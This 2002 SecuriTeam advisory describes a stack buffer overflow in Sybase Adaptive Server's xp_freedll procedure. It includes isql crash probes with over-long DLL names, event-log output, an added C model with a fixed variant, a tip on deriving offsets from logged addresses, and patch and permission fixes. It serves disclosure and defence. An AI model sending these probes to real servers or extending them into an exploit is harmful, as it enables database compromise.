[NT] Sybase xp_freedll Buffer Overflow
From: support@securiteam.com
Date: 11/28/02
From: support@securiteam.com To: list@securiteam.com Date: 28 Nov 2002 15:54:11 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Sybase xp_freedll Buffer Overflow
------------------------------------------------------------------------
SUMMARY
The extended stored procedure xp_freedll contains a buffer overflow that
may allow an attacker to overwrite the stack and execute arbitrary code
under the security context of the server. Execute permission on this
extended stored procedure is granted to public in the sybsystemprocs
database, so any database user can reach it.
DETAILS
Vulnerable systems:
* Sybase Adaptive Server 12.0 and 12.5
Sybase Adaptive Server provides an extended stored procedure (ESP) called
xp_freedll in the database sybsystemprocs. This ESP is used to release a
DLL that has been loaded into the XP Server by another extended stored
procedure.
xp_freedll accepts a single parameter, the name of the DLL to free. It does
not validate the length of that string and copies it into a small
fixed-size buffer on the stack. An overly long name overruns the buffer and
overwrites the data saved above it, including the pointer the ESP later
passes to the Open Server send routines and the saved return address. Once
the return address is overwritten, execution can be redirected to an
arbitrary location in memory, so opcodes embedded in the long string passed
to the ESP can be executed. This allows the attacker to run arbitrary code
under the security context of the XP Server (the extended stored procedure
server process).
Below is an example of overflowing the buffer using the SQL tool isql.exe.
The lengths given are those of the whole quoted name, ".dll" included.
Memory corruption first occurs with a name of length 45.
1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'
2> GO
Msg 11496, Level 16, State 7:
Procedure 'xp_freedll', Line 2:
Cannot read from site 'MRFREEZE_XP'. Please check the XP Server error log
file for detailed error description. (return status = -6)
--------------------------------------------------------------------------------
With a name of 53 bytes in length, an exception is thrown in the XP Server.
1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'
2> GO
Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp. If this is
an user DLL check the code else contact Sybase Technical Support. (return
status = 1)
The following entries are recorded in the event log.
11403: Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp. If
this is an user DLL check the code else contact Sybase Technical Support.
11403: Encountered an exception(193) in ESP xp_freedll in DLL sybsyesp. If
this is an user DLL check the code else contact Sybase Technical Support.
11403: Encountered an exception(997) in ESP xp_freedll in DLL sybsyesp. If
this is an user DLL check the code else contact Sybase Technical Support.
--------------------------------------------------------------------------------
At 54 bytes in length, the following memory addresses appear in the event
log. The "not in pool" errors come from the Open Server routines that
receive the overwritten pointer:
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address
0x696c6c not in pool in 'srv_senddone()' .
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address
0x696c6c not in pool in 'srv_sendinfo()' .
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address
0x696c6c not in pool in 'srv_sendstatus' .
--------------------------------------------------------------------------------
At 55 bytes in length, the following memory address appears in the event
log:
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address
0x642e5858 not in pool in 'srv_senddone()' .
Notice that the address now contains 0x5858: 0x58 is the ASCII code for
'X', the character used to fill the overflow string.
--------------------------------------------------------------------------------
As the name is lengthened further, the address is completely overwritten by
the buffer contents (0x58585858, four 'X' characters).
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process address
0x58585858 not in pool in 'srv_sendstatus' .
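The following is an added example, not code from the advisory or from Sybase: a small C model of what the log entries above show. A DLL name is copied unchecked into a fixed stack buffer, and the bytes that spill past it land on whatever the frame keeps next, here a 4-byte local, the saved pointer later handed to the Open Server send routines, and the return address. All offsets are assumptions chosen so that the model reproduces the advisory's observations (first corruption at 45 bytes, the value 0x642e5858 at 55 bytes, 0x58585858 beyond that); the real xp_freedll frame layout is not known from the advisory. The "frame" is a plain byte array so the demonstration itself never writes out of bounds. The hardened variant shows the check that was missing: refuse any name that cannot fit together with its terminator.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame model. Every offset here is an assumption, not the real layout. */
#define NAME_LEN   45   /* buffer size: the advisory first sees corruption at 45 */
#define STATUS_OFF 45   /* assumed 4-byte local sitting just above the buffer    */
#define PROC_OFF   49   /* assumed saved SRV_PROC pointer: gives "XX.d" at 55    */
#define RET_OFF    53   /* assumed saved return address                           */
#define FRAME_SIZE 80   /* slack so the model never writes past the array         */

struct probe_result { uint32_t status, srv_proc, ret; };

static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void store_le32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Constructed initial frame contents (values are illustrative only). */
static void init_frame(unsigned char *f)
{
    memset(f, 0, FRAME_SIZE);
    store_le32(f + STATUS_OFF, 0x00000001u);   /* some local variable        */
    store_le32(f + PROC_OFF,   0x00a1b2c3u);   /* pointer into the server pool */
    store_le32(f + RET_OFF,    0x0040ab12u);   /* return address              */
}

/* Vulnerable model: the copy is bounded by nothing but the string itself. */
void xp_freedll_vuln(unsigned char *f, const char *dllname)
{
    size_t n = strlen(dllname) + 1;            /* terminating NUL included */
    init_frame(f);
    if (n > FRAME_SIZE) n = FRAME_SIZE;        /* keeps the *model* in bounds */
    memcpy(f, dllname, n);                     /* bug: n may exceed NAME_LEN */
}

/* Hardened model: reject a name that does not fit with its terminator. */
int xp_freedll_safe(unsigned char *f, const char *dllname)
{
    size_t len = strlen(dllname);
    if (len >= NAME_LEN)
        return -1;                             /* caller reports an error */
    init_frame(f);
    memcpy(f, dllname, len + 1);
    return 0;
}

/* Builds the advisory's probe: (total - 4) 'X' characters followed by ".dll". */
static void make_probe(char *out, size_t outsz, size_t total)
{
    size_t xs = total > 4 ? total - 4 : 0;
    if (xs + 5 > outsz) xs = outsz - 5;
    memset(out, 'X', xs);
    memcpy(out + xs, ".dll", 5);
}

/* Runs the vulnerable copy with a probe of `total` bytes and reports what
 * the three saved values look like afterwards. */
struct probe_result probe(size_t total)
{
    char name[FRAME_SIZE];
    unsigned char f[FRAME_SIZE];
    struct probe_result r;
    make_probe(name, sizeof name, total);
    xp_freedll_vuln(f, name);
    r.status   = load_le32(f + STATUS_OFF);
    r.srv_proc = load_le32(f + PROC_OFF);
    r.ret      = load_le32(f + RET_OFF);
    return r;
}

/* 1 if the hardened variant accepts a probe of `total` bytes, else 0. */
int safe_accepts(size_t total)
{
    char name[FRAME_SIZE];
    unsigned char f[FRAME_SIZE];
    make_probe(name, sizeof name, total);
    return xp_freedll_safe(f, name) == 0;
}

int main(void)
{
    size_t lens[] = { 44, 45, 53, 55, 60 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        struct probe_result r = probe(lens[i]);
        printf("%2zu bytes: status=0x%08x srv_proc=0x%08x ret=0x%08x safe=%s\n",
               lens[i], r.status, r.srv_proc, r.ret,
               safe_accepts(lens[i]) ? "accepted" : "rejected");
    }
    return 0;
}
```

Running it walks the same progression as the advisory: at 44 bytes everything is intact, at 45 the terminating NUL clips the local just past the buffer, at 55 the saved pointer reads 0x642e5858 ("XX.d" in little-endian order), and from 57 bytes on it is 0x58585858. The hardened variant accepts 44 and refuses 45 and everything longer. The same reasoning lets you turn the logged addresses on a real system back into an offset: each byte of the address is one character of the name, so the position of ".dll" within it tells you how far the pointer sits from the start of the buffer.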
--------------------------------------------------------------------------------
Fix:
Execute permission on the extended stored procedure xp_freedll in the
sybsystemprocs database should be revoked from public. Revoking the
permission only limits who can reach the overflow; apply one of the
following patches to remove it:
* 12.5.0.2 - 11/14/2002
* 12.0.0.6 ESD#1 - 11/5/2002
These patches can be downloaded from http://downloads.sybase.com/swd/swx
ADDITIONAL INFORMATION
The original advisory is available at:
http://www.appsecinc.com/resources/alerts/sybase/02-0003.html
The information has been provided by Aaron C. Newman (Application
Security, Inc.), anewman@appsecinc.com.